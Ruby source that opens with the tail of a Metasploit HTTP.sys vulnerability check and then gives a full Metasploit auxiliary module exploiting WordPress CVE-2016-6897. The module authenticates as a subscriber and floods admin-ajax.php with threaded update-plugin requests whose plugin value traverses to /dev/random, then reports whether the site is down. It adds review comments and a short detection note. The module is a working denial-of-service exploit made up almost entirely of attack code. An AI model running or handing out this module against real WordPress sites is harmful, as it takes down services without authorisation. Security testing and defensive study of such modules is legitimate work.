      vmessage = "#{peer} - Checking #{uri}"

      if res && res.body.include?('Requested Range Not Satisfiable')
        vprint_status("#{vmessage} [#{res.code}] - Vulnerable")

        target_uri.path = uri # Needed for the DoS attack

        return Exploit::CheckCode::Vulnerable
      elsif res && res.body.include?('The request has an invalid header name')
        # Patched HTTP.sys rejects the header outright
        vprint_status("#{vmessage} [#{res.code}] - Safe")

        return Exploit::CheckCode::Safe
      else
        vprint_status("#{vmessage} - Unknown")
      end
    end

    Exploit::CheckCode::Unknown
  end
end
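##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Auxiliary DoS module for CVE-2016-6897: in WordPress before 4.6 the
# wp_ajax_update_plugin handler checks the nonce too late, so an
# authenticated subscriber can make the server read an arbitrary path.
# The module logs in with USERNAME/PASSWORD, then sends RLIMIT POSTs to
# admin-ajax.php with action=update-plugin and a plugin value of DEPTH "../"
# segments followed by dev/random, THREADS at a time, and finally checks
# whether the site still answers. Detection: update-plugin requests whose
# plugin value contains "../" from a non-administrator session.
class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HTTP::Wordpress
  include Msf::Auxiliary::Dos

  # Registers module metadata and the RLIMIT, THREADS, TIMEOUT, DEPTH,
  # USERNAME and PASSWORD options.
  #
  # @param info [Hash] base module info merged through update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WordPress Traversal Directory DoS',
        'Description' => %q{
          Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin
          function in wp-admin/includes/ajax-actions.php in WordPress before 4.6
          allows remote attackers to hijack the authentication of subscribers
          for /dev/random read operations by leveraging a late call to
          the check_ajax_referer function, a related issue to CVE-2016-6896.},
        'License' => MSF_LICENSE,
        'Author' => [
          'Yorick Koster', # Vulnerability disclosure
          'CryptisStudents' # Metasploit module
        ],
        'References' => [
          ['CVE', '2016-6897'],
          ['EDB', '40288'],
          ['OVE', 'OVE-20160712-0036']
        ]
      )
    )

    register_options(
      [
        OptInt.new('RLIMIT', [true, 'The number of requests to send', 200]),
        OptInt.new('THREADS', [true, 'The number of concurrent threads', 5]),
        OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 5]),
        OptInt.new('DEPTH', [true, 'The depth of the path', 10]),
        OptString.new('USERNAME', [true, 'The username to send the requests with', '']),
        OptString.new('PASSWORD', [true, 'The password to send the requests with', ''])
      ]
    )
  end

  # @return [Integer] total number of requests to send (RLIMIT)
  def rlimit
    datastore['RLIMIT']
  end

  # @return [String] WordPress user name (USERNAME)
  def username
    datastore['USERNAME']
  end

  # @return [String] WordPress password (PASSWORD)
  def password
    datastore['PASSWORD']
  end

  # @return [Integer] requests sent concurrently per batch (THREADS)
  def thread_count
    datastore['THREADS']
  end

  # @return [Integer] TIMEOUT option. NOTE(review): registered but not read by
  #   the request path below, which uses a fixed 0.2 second timeout — confirm intent.
  def timeout
    datastore['TIMEOUT']
  end

  # @return [Integer] number of "../" segments in the plugin path (DEPTH)
  def depth
    datastore['DEPTH']
  end

  # Checks that `user` exists on the target and reports the result.
  #
  # @param user [String] user name to check
  # @return [Boolean] true when the user exists
  def user_exists(user)
    unless wordpress_user_exists?(user)
      print_error("\"#{user}\" is not a valid username")
      return false
    end
    print_good("Username \"#{user}\" is valid")
    true
  end

  # Validates the target and user, logs in, sends the requests in batches of
  # THREADS, then checks whether the site is still online.
  def run
    unless wordpress_and_online?
      print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress")
      return
    end

    print_status("Checking if user \"#{username}\" exists...")
    unless user_exists(username)
      print_error('Aborting operation - a valid username must be specified')
      return
    end

    cookie = wordpress_login(username, password)
    if cookie.nil?
      print_error('Aborting operation - failed to authenticate')
      return
    end
    # Record the credential only once the login actually produced a session
    # cookie; the original stored it before the nil check.
    store_valid_credential(user: username, private: password, proof: cookie)

    path = "/#{'../' * depth}dev/random"

    starting_thread = 1
    # `<=` so the last request is still sent when rlimit is one past a batch
    # boundary (the original `<` skipped it, e.g. RLIMIT=6 with THREADS=5).
    while starting_thread <= rlimit
      ubound = [rlimit - (starting_thread - 1), thread_count].min
      last_request = (starting_thread + ubound) - 1
      print_status("Executing requests #{starting_thread} - #{last_request}...")

      threads = 1.upto(ubound).map do |offset|
        request_number = (starting_thread - 1) + offset
        # Block parameter is named differently from the loop variable to avoid
        # the shadowing the original had (`|i| ... do |i|`).
        framework.threads.spawn("Module(#{refname})-request#{request_number}", false, request_number) do |number|
          send_update_plugin_request(path, cookie, number)
        end
      end

      threads.each(&:join)

      print_good("Finished executing requests #{starting_thread} - #{last_request}")
      starting_thread += ubound
    end

    if wordpress_and_online?
      print_error("FAILED: #{target_uri} appears to still be online")
    else
      print_good("SUCCESS: #{target_uri} appears to be down")
    end
  end

  private

  # Sends one update-plugin POST with the traversal path and the session
  # cookie, waiting at most 0.2 s for a response. Any error during the request
  # is reported as a timeout, as in the original.
  #
  # @param path [String] plugin value containing the traversal segments
  # @param cookie [String] authenticated session cookie
  # @param request_number [Integer] 1-based index used only in error output
  def send_update_plugin_request(path, cookie, request_number)
    send_request_cgi(
      {
        'method' => 'POST',
        'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'),
        'vars_post' => {
          'action' => 'update-plugin',
          'plugin' => path
        },
        'cookie' => cookie
      },
      0.2
    )
  rescue StandardError
    print_error("Timed out during request #{request_number}")
  end
end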